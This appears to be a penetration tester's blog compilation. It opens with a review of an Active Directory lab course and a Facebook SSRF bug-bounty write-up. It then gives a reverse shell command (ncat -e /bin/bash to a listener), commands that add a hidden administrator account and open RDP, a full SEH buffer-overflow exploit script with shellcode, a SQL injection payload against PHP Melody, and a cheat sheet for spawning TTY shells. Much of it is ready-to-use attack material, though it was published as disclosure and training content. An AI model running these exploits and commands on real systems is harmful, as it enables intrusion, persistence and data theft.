Active Directory Labs Journey


Hello All,

It been long time since I wrote my last blog. Hopefully I will again get back on track and write some more blogs post soon which are in my to-do list. So without wasting more time lets focus on the Active Directory Lab Journey.

Basics

The purpose of this post is to write a review of Active Directory Lab course which is hosted by Pentester Academy & designed by Nikhil Mittal. As mentioned on their website the course is indeed "... designed to provide a platform for security professionals to understand, analyze and practice threats and attacks in a modern Active Directory environment. The lab is beginner friendly and comes with a complete video course and lab manual. "
The course comes with options of 30, 60 or 90 days of lab access. I choose the 30 days options as I was familiar with Windows AD environment and some attack vectors. My aim was to learn and fill the gaps which I may not have known.

They also provide a challenge lab with their Windows Red team Labs course, you can find a detailed review of the course here: - https://3xpl01tc0d3r.blogspot.com/2019/03/windows-red-team-lab-journey.html

Course Material and Labs

The course is packed with videos and manual along with the solutions to solve lab objectives.

Getting Started

You can choose to start  your lab access immediately or anytime within the next 90 days based on lab availability.
On the day you choose to start the lab, you will be provided with an VPN and a Windows VM. You can connect the student machine via RDP. All details will be provided in the email.

Lab Network
Lab Network. Image Credits: pentesteracademy.com
Lab Review

Students will be provided access to the student machine (Windows 10) with low privilege user in the Active Directory. The machine is connected to the Active Directory and has antivirus running. Students are tasked to escalate the privilege on the student machine to gain admin privilege and disable the antivirus to load the tools which will help them to progress through the course and lab. It is not possible to connect to the student machine apart from RDP.

The course video allows students to go through the videos and then solve the tasks mentioned in the end of the video and get hands on understanding in the lab.

The course helped me learn many new concepts and cleared lot of my concepts regarding windows AD environment. The lab is designed to make student aware of the windows misconfigurations and finding ways in which an enterprise network can be compromised. The lab does not make use of any known exploits and does not encourage use of exploitation techniques to progress through the course.

The course has 23 learning objectives as we progress through the course, including multiple tasks in each objective.

The course is very informative and the best place to start for any beginner or a red teamer, to get a good understanding of various attack vectors which can be leverage to compromise an enterprise.

I really liked the course content and the lab which is really fantastic.

My Approach

After clearing the exam a lot of my friends asked me how I approached the lab (as few have enrolled), or how can they do it once they enroll.
So my approach was to go through the course video one by one and understand it.
I also made notes along the course and then tried to solve the learning objectives as they come at end of each topic. In place where I was stuck, I referred the lab walkthrough manual or gone through the lab walktrough video.

The topics covered in the course are to the point, and hence based on your understanding you may need to read more on few topics before proceeding.

Exam Review

The exam is completely an practical exam. There are 5 systems in the exam with forest environment. Students are given 24 hrs to complete the exam, and next 48 hours to write a detail report & submit the report. The report should contain the step by step walk through to compromise the system. It should also contain the practical recommendation for all the vulnerabilities which student has exploited to gain access on the system. The goal of the exam is to gain command execution on the system with any privilege.

To clear the exam minimum of three boxes need to be compromised, and the report quality should be good. The focus is not just on compromising all the boxes but on writing good reports as well.

I was able to compromise 4 machines and on the last one I got partial execution.

Tip: Make notes of commands you practice in the labs along with short description about the command. This comes really handy at the time of exam.

Conclusion

The course is very informative and recommended for everyone. Special thanks to Nikhil Mittal for this course.

Note: All opinions on the blog are mine, reading of any or all information on https://w00troot.blogspot.com is of your own free will.

How I found SSRF on TheFacebook.com

Hello World,

Hope you'll are doing well & I know you are reading this post after reading the post title, SSRF on Thefacebook.com's server? dafaq? seriously?

Trust me the POC is quiet simple, Only thing is I was lucky enough to enumerate & find the domain vulnerable to this attack.

How I found this domain!


I got a WhatsApp message in one of the Cyber Security groups about " Facebook Internal IP Disclosure ". I visited the page to get myself motivated to do some bug hunting. 

To my surprise the website mentioned in the article was hosting a page with Universal Description Discovery and Integration (UDDI) functionality running on Oracle WebLogic web server.

If you guys are aware Weblogic server is known to have been vulnerable to SSRF. I was aware of the known vulnerability as I had encountered it in one of the security assessment done for a client.

Then I had mixed thoughts, facebook would have definitely patched the vulnerability and so on, but what's the harm in trying.

Soon I fired up laptop and the tools to check if the site was vulnerable to SSRF.

Step to reproduce submitted to Facebook.


Step 1 - https://esbmbltest.thefacebook.com/uddiexplorer/SearchPublicRegistries.jsp















Step 2 - Enter any information and capture the request into the proxy tool like burp suit or IronWASP.


















Step 3 - The operator parameter must be changed to any Internal IP range or any public IP.



















Step 4 - The application server successfully connects to the external IP sent in the operator. This shows external SSRF vulnerability is preset.














Step 5 - To test internal SSRF we input an internal IP range and forward the request. The server will respond with a time delay if the connection is made. 

The time delay in response is around 800-900 milliseconds when the host is up and running.


The time delay in response is 120,000 milliseconds when the host is down.




















With this information we can enumerate the Internal infrastructure behind a firewalled environment.

Step 6 - For further understanding. Intercept in IronWasp and browse the page. 

Step 7 - Select the logs and the request made. And select Run Modules on this Request/Response. And select SSRF Exploitation Frame work.































Step 8 - Select the Set Injection Points and select Operator parameter in the body and click on Done.



























Step 9 - Select Port Scan or Network Discovery and then we need to input a IP range. 


Step 10 - We can enumerate the Internal IP which are active.



































I also submitted a video POC for the vulnerability. 


Facebook accepted the vulnerability and awarded me with a good bounty as I reported the SSRF vulnerability on 2 Hosts. :D



I hope you liked the write up , I would appreciate your feedback in the comments down below ;)

Opinions are mine on the blog.

Using Vi in Low Privilege Shell

This blog will show you how to upgrade a reverse shell to a full feature TTY shell and also use Vi editor in a low privilege shell.


Step 1: Grab a reverse shell.

Victim Machine : ncat -nv 192.168.125.158 -e /bin/bash












Kali Machine : nc -lvp 443















Step 2 : Break the jail Shell

Command : python -c 'import pty; pty.spawn("/bin/bash")'


















Step 3: Now we need to background the current shell by CTRL + Z.
















Step 4: We need some information of our current terminal to match the background shell.

# echo $TERM
# stty -a















The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 24; columns 80")

Step 5: As we have the shell in the background, we can now set the current STTY to raw and echo the input characters.

# stty raw -echo






The terminal looks weird and any thing type won't be seen but will be processed.

Step 6: To bring the shell to foreground we can type "fg". It will re-open the reverse shell but formatting will be off.

And then reinitialize the terminal with reset.

# fg
# reset








Press enter after 'fg' and then after 'reset'. You will get the shell terminal back.







Step 7: As formatting was set as off. We need to now match the current shell to our Kali terminal with the information gathered in step 4. The below mentioned commands need to be entered :

$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 24 columns 80




















Now we have a full featured TTY shell which features the Tab , auto-complete and we can use Vi editor in low privilege shell.






Adding User Via Windows Command Line

Adding users Windows


Step 1 - Add User

net user 'username' 'password' /add

C:\WINDOWS\system32>net user thunder password /add 

Step 2 - Add the new User to Remote Desktop Group

net localgroup "Remote Desktop users" 'username' /add

C:\WINDOWS\system32>net localgroup "Remote Desktop users" thunder /add

Step 3 - Adding new user to Administrator group

net localgroup Administrators 'username' /add

C:\WINDOWS\system32>net localgroup Administrators thunder /add

All the above steps in a Single Command

C:\WINDOWS\system32>net user thunder password /add && net localgroup "Remote Desktop users" thunder /add && net localgroup Administrators thunder /add

Note : Make sure you have administrator privileges.
In case of an error, there is a possibility of Password Complexity set on the Remote Machine, try a complex password.

Enable Remote Desktop Protocol Services


C:\WINDOWS\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Add Firewall Rule in Windows to Allow Remote Desktop Connection


C:\WINDOWS\system32>netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)

#############################################################################
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
#############################################################################

#Vulnerable Software: Easy MPEG/AVI/DIVX/WMV/RM to DVD
#Vulnerability Name : Buffer Overflow (SEH)
# Exploit Author:         Venkat Rajgor
# Vendor Homepage:   http://www.divxtodvd.net/
# Software Link:          http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On:                 Windows 7 x64 
#############################################################################
Exploit Proof of Concept :

#!/usr/bin/python ###############################################################################
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH) 
# Date: 05-10-2017 
# Exploit Author: Venkat Rajgor 
# Vendor Homepage: http://www.divxtodvd.net/ 
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe 
# Tested On: Windows 7 x64 
# # # To reproduce the exploit: 
# 1. Click Register 
# 2. In the "Enter User Name" field, paste the content of evil.txt 
############################################################################## 
filename="evil.txt" 
#Buffer
buffer = "\x41" * 1008 
#short Jump 
nSEH = "\xEB\x06\x90\x90" 
#SEH 
SEH = "\x59\x78\x03\x10" 
# Bad Chars 
badchars = "\x00\x0A\x0D\x1A" 

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c 

# Payload To Popup Calculator 

shell=( "\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52" 
"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61" 
"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e" 
"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99" 
"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f" 
"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98" 
"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94" 
"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23" 
"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1" 
"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff" 
"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59" 
"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3" 
"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09" 
"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96") 

evil = "\x90"*20 + shell buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

##############################################################################
#End of Exploit

Screenshot for Reverse Shell:




PHP Melody 2.6.1 SQL Injection - CVE-2017-15081


###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

###################################################
Proof of Concept :


Breaking the Jail Shell

Spawning a TTY Shell

Commands to spawn a TTY shell from a limited / jail shell in Linux, useful for running commands like su from reverse shells.


Python TTY Shell

python -c 'import pty; pty.spawn("/bin/sh")'

python -c 'import pty; pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive shell

/bin/sh -i

/bin/bash -i

Spawn Perl TTY Shell

exec "/bin/sh";

perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

:!bash

Spwan TTY Shell NMap

!sh